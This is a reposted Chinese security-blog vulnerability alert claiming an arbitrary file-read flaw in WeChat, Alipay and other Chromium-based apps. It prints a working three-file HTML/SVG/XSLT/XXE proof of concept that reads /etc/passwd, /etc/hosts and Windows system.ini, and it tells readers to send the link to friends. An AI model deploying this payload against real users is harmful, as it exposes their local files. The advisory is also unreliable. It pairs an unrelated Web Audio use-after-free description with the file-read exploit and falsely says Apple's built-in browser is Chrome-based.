【核弹级漏洞预警】苹x果、微x、支x宝、小x浏览器、携x应用等均存在任意文件读取漏洞

admin 2024年2月29日12:58:30评论39 views字数 2285阅读7分37秒阅读模式

一、漏洞描述

漏洞描述:
Google Chrome 是 Google 公司开发的网页浏览器,Web Audio 是用于在浏览器中进行音频处理和合成的 API,Google Chrome 121.0.6167.85 之前版本中的 Web Audio 在重新创建与电脑、手机、VR浏览器等目标平台的连接并断开连接后,图形渲染过程中自动拉取节点的扇出数与主线程的扇出数可能不匹配,从而导致释放后使用漏洞。远程攻击者可利用该漏洞诱导用户访问恶意构造的 HTML 页面造成堆破坏,进而导致浏览器崩溃或远程代码执行,补丁版本通过强制在图形渲染之前更新自动拉取节点的渲染状态,以确保在执行音频处理函数调用之前,扇出数保持一致修复此漏洞。

影响范围:
chrome(-∞, 121.0.6167.85)

chromium(-∞, 121.0.6167.85)

chromium(-∞, 121.0.6167.85-1)

chromium影响所有版本

chromium(-∞, 121.0.6167.85-1~deb12u1)

chromium(-∞, 121.0.6167.85-1)

微信、支付宝、小米浏览器、携程应用等国内主流软件均存在任意文件读取漏洞。此漏洞源于谷歌浏览器内核漏洞,而国内很多app,包括苹果内置浏览器均为谷歌浏览器,故影响全系列产品。

使用谷歌浏览器内核的应用基本都受影响,如:手机微信,支付宝,抖音,携程,小米(自带浏览器),UC浏览器,via浏览器,夸克浏览等等(这些都是11月19日晚测过的)

三、漏洞复现

以安卓版微信,读取手机/etc/hosts文件为例:

微信版本为最新版8.0.43

【核弹级漏洞预警】苹x果、微x、支x宝、小x浏览器、携x应用等均存在任意文件读取漏洞

构造三个文件并部署在服务器上

c.html

<body><div id="r"></div><script>const ifr = document.createElement('iframe');ifr.style.display = 'none';document.body.appendChild(ifr);ifr.onload = function() {  const ifrContent = ifr.contentWindow.document.documentElement.innerHTML;  r.innerHTML = `current url:<br />${location.href}<br /><br />get data:<br />${ifrContent}`;}ifr.src = "./c2.svg";var data = `current url:<br />${location.href}<br /><br />get data:<br />${ifrContent}`;alert(data);</script></body>

【核弹级漏洞预警】苹x果、微x、支x宝、小x浏览器、携x应用等均存在任意文件读取漏洞

c2.svg

<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="?#"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/"><svg width="1000%" height="1000%" version="1.1" xmlns="http://www.w3.org/2000/svg">  <foreignObject class="node" font-size="18" width="100%" height="100%">    <body xmlns="http://www.w3.org/1999/xhtml">      <xmp>        <xsl:copy-of select="document('./c3.xml')"/>      </xmp>    </body>  </foreignObject></svg></xsl:template></xsl:stylesheet>

【核弹级漏洞预警】苹x果、微x、支x宝、小x浏览器、携x应用等均存在任意文件读取漏洞

c3.xml

<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xml" href="?#"?><!DOCTYPE p [<!ENTITY passwd SYSTEM "file:///etc/passwd"><!ENTITY hosts SYSTEM "file:///etc/hosts"><!ENTITY group SYSTEM "file://localhost/etc/group"><!ENTITY sysini SYSTEM "file:///c:/windows/system.ini">]><p><p style="border-style: dotted;">/etc/passwd:&passwd;</p><p style="border-style: dotted;" id="hosts">/etc/hosts:&hosts;</p><p style="border-style: dotted;">/etc/group:&group;</p><p style="border-style: dotted;">c:/windows/system.ini:&sysini;</p></p>

【核弹级漏洞预警】苹x果、微x、支x宝、小x浏览器、携x应用等均存在任意文件读取漏洞 

创建好三个文件后,上传至服务器上部署

将构造好的链接通过会话框发给任意好友

【核弹级漏洞预警】苹x果、微x、支x宝、小x浏览器、携x应用等均存在任意文件读取漏洞

然后点击这个链接,返回如下则漏洞存在 

【核弹级漏洞预警】苹x果、微x、支x宝、小x浏览器、携x应用等均存在任意文件读取漏洞

四、漏洞修复建议

1、升级应用内置浏览器版本;

2、用户不要点击陌生链接,防止被攻击

原文始发于微信公众号(TKing的安全圈):【核弹级漏洞预警】苹x果、微x、支x宝、小x浏览器、携x应用等均存在任意文件读取漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月29日12:58:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【核弹级漏洞预警】苹x果、微x、支x宝、小x浏览器、携x应用等均存在任意文件读取漏洞https://cn-sec.com/archives/2536295.html

发表评论

匿名网友 填写信息